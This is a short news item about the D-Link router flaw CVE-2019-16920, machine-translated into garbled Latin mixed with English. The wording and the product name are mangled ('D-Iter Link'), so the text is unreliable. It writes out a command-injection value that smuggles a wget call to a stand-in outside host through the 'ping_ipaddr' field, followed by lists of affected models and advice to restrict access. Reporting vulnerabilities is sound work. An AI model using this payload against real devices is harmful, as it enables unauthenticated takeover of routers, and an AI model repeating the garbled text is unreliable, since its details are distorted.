Longe exploitable vulnerability in D-Iter Link

In D-Link wireless iter itineris identified " periculosum vulnerability (CVE-2019-16920) , quod te permittit ut codicem penitus exsequi in parte fabricae mittendo specialem petitionem ad "ping_test" tracto, sine authenticitate pervia.

Interestingly, secundum tincidunt firmware, vocatio "ping_test" solum post authenticationem exsecutioni mandari debet, re vera vero vocatur in casu, cuiuscumque colligationis in interfaciem interretialis. Praesertim, cum scripturae applicatio_sec.cgi accedens et "actio ping_test" parametri transeat, scriptura redit ad paginam authenticas, sed simul actionem cum ping_test coniungit. Ad codicem exsequendum, alia vulnerabilitas in ipso testo pingendi adhibita est, quae pingens utilitatem vocat, quin recte reprehendat rectitudinem IP inscriptionis ad probandum. Exempli gratia, utilitatem wget vocare et eventum "echo 1234" ad exercitum externum transferre, modulum "ping_ipaddr=127.0.0.1%0awget% 20-P% 20/tmp/ 20http://". test.test/?$( resonare 1234)".

Longe exploitable vulnerability in D-Iter Link

Praesentia vulnerabilitas in sequentibus exemplaribus publice confirmata est:

  • DIR-655 firmware 3.02b05 vel maior;
  • DIR-866L cum firmware 1.03b04 vel maior;
  • DIR-1565 cum firmware 1.01 vel senior;
  • DIR-652 (nulla notitia de versionibus firmware problematicarum provisorum)

Firmamentum tempus horum exemplorum iam exspiravit, ut D-Link Affirmabatquae renovationes ad tollendas vulnerabilitatem non dimittet, eas non commendat et novis machinis eas reponat. Pro securitate cui labor circumscribere potes accessum interfaciendi ad IP inscriptiones tantum confisas.

Postea compertum est vulnerabilitatem etiam fuisse afficit exempla DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 et DIR-825, consilia renovandi pro quibus nondum nota sunt.

Source: opennet.ru